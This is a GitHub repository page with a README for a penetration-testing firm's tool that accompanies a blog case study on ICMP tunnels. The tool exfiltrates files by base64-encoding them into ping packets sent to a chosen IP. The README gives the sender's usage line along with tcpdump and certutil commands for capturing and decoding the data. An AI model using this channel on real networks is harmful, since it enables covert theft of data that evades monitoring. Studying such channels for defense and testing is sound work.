https://github.com/notsosecure/icmp_tunnel_ex_filtrate

Code snippet accompanying blog post
https://github.com/notsosecure/icmp_tunnel_ex_filtrate

Last synced: 3 months ago
JSON representation

Code snippet accompanying blog post

• Host: GitHub
• URL: https://github.com/notsosecure/icmp_tunnel_ex_filtrate
• Owner: NotSoSecure
• License: gpl-3.0
• Created: 2015-10-14T17:24:29.000Z (about 9 years ago)
• Default Branch: master
• Last Pushed: 2015-10-14T18:14:59.000Z (about 9 years ago)
• Last Synced: 2024-04-24T13:19:32.625Z (7 months ago)
• Language: Python
• Homepage: https://www.notsosecure.com/2015/10/15/icmp-tunnels-a-case-study/
• Size: 120 KB
• Stars: 27
• Watchers: 6
• Forks: 18
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

• awesome-network-stuff - **17**星

README

        
# Data Ex-filteration over ICMP Tunnel

__icmp_transmitter.exe__ is an executable used to send files on one system to another using icmp ping packets. The tool first converts the file(an exe, image, document etc) to base64 encoded text. This will then send the ping requests each with 64 characters of data taken from the base64 encoded text file. The tools needs a packet capture softwares on the other side to capture and record all the ping packets as .pcap or .txt files. Use the parser.sh to quickly parse the pcap file and have the text file with base64 encoded data. Once this is done, use certutil to convert back the text file into respective file format.

### Usage:

```icmp_transmitter.exe "input_file_to_be_sent" "IP_address_to_be_sent"```

at the server end:

 

run tcpdump. Use the following command :

```sudo tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo -XX -vvv -w output.txt```

Use certutil to decode the base64 data to respective format

```certutil -decode "base_64_encoded_textfile" "file.extention"```

The files and source code can be downloaded from: https://github.com/NotSoSecure/icmp_tunnel_ex_filtrate/releases